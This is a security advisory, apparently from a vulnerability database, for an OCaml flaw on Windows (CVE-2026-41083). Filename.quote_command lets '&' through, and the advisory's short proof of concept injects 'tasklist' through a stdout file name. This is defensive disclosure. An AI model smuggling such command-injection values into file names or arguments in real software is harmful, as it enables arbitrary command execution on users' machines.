PT-2026-50717 · Git · Ocaml

Publicado

2026-04-18

Atualizado

2026-06-18

CVE-2026-41083

CVSS v3.1

6.1

Média

Vetor

AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N

The quoting of stdin/stdout/stderror (using Filename.quote command) on Windows is not sufficient, and allows the & character to be passed through. This allows an attacker to inject a shell command if they can specify the stdin/stdout/stderr of a program to be executed.

Exploit

bash

$ opam exec -- ocaml
OCaml version 4.14.2
Enter #help;; for help.

# let outfile = "x&tasklist" in
 let cmd = Filename.quote command "netsh.exe" ~stdout:outfile ["help"] in
 ignore (Sys.command cmd)
 ;;

Image Name           PID Session Name    Session#  Mem Usage
========================= ======== ================ =========== ============
System Idle Process       0 Services          0     8 K
System              4 Services          0    168 K
Secure System         236 Services          0  191,468 K
Registry            276 Services          0   3,428 K
smss.exe            608 Services          0   1,676 K
csrss.exe           984 Services          0   5,928 K

Timeline

2026-06-18 release of this security advisory
2026-06-15 release of OCaml 4.14.4
2026-06-08 fix by David Allsopp https://github.com/ocaml/ocaml/pull/14853
2026-04-11 reported by Anil Madhavapeddy, forwarded from Andrew Nesbitt to security@ocaml.org

Correção

Encontrou algum problema na descrição? Tem algo a acrescentar? Fique à vontade para nos escrever 👾

dbugs@ptsecurity.com

Identificadores relacionados

CVE-2026-41083

OSEC-2026-05

Produtos afetados

Ocaml

PT-2026-50717 · Git · Ocaml

CVE-2026-41083

Exploit

Timeline

Identificadores relacionados

Produtos afetados

Referências · 1